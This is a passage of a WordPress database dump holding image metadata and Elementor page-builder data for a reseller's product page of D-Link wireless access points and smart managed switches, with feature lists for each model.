0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3550,2649,'_wp_attached_file','2018/12/DGS-1510-28X-510x600.jpg'),(3551,2649,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:510;s:6:\"height\";i:600;s:4:\"file\";s:32:\"2018/12/DGS-1510-28X-510x600.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"DGS-1510-28X-510x600-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"DGS-1510-28X-510x600-255x300.jpg\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"DGS-1510-28X-510x600-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"DGS-1510-28X-510x600-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:32:\"DGS-1510-28X-510x600-510x400.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"DGS-1510-28X-510x600-17x20.jpg\";s:5:\"width\";i:17;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3556,2650,'_elementor_version','0.4'),(3559,2651,'_edit_lock','1545289153:1'),(3560,2651,'_edit_last','1'),(3561,2651,'_wp_page_template','template-fullwidth.php'),(3562,2651,'_hide_page_title',''),(3563,2651,'_hide_header',''),(3564,2651,'_hide_footer',''),(3565,2651,'_hide_breadcrumb',''),(3566,2651,'_cover',''),(3567,2651,'_show_excerpt',''),(3568,2651,'_wc_apply_product',''),(3569,2651,'_yoast_wpseo_content_score','90'),(3570,2654,'_wp_attached_file','2018/12/DGS-1100-26-front-510x600-510x600.jpg'),(3571,2654,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:510;s:6:\"height\";i:600;s:4:\"file\";s:45:\"2018/12/DGS-1100-26-front-510x600-510x600.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"DGS-1100-26-front-510x600-510x600-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"DGS-1100-26-front-510x600-510x600-255x300.jpg\";s:5:\"width\";i:255;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:45:\"DGS-1100-26-front-510x600-510x600-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:45:\"DGS-1100-26-front-510x600-510x600-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:45:\"DGS-1100-26-front-510x600-510x600-510x400.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:43:\"DGS-1100-26-front-510x600-510x600-17x20.jpg\";s:5:\"width\";i:17;s:6:\"height\";i:20;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3579,2656,'_wp_page_template','template-fullwidth.php'),(3580,2656,'_elementor_edit_mode','builder'),(3581,2656,'_elementor_template_type','post'),(3582,2656,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3583,2656,'_elementor_version','0.4'),(3586,2657,'_wp_page_template','template-fullwidth.php'),(3587,2657,'_elementor_edit_mode','builder'),(3588,2657,'_elementor_template_type','post'),(3589,2657,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product 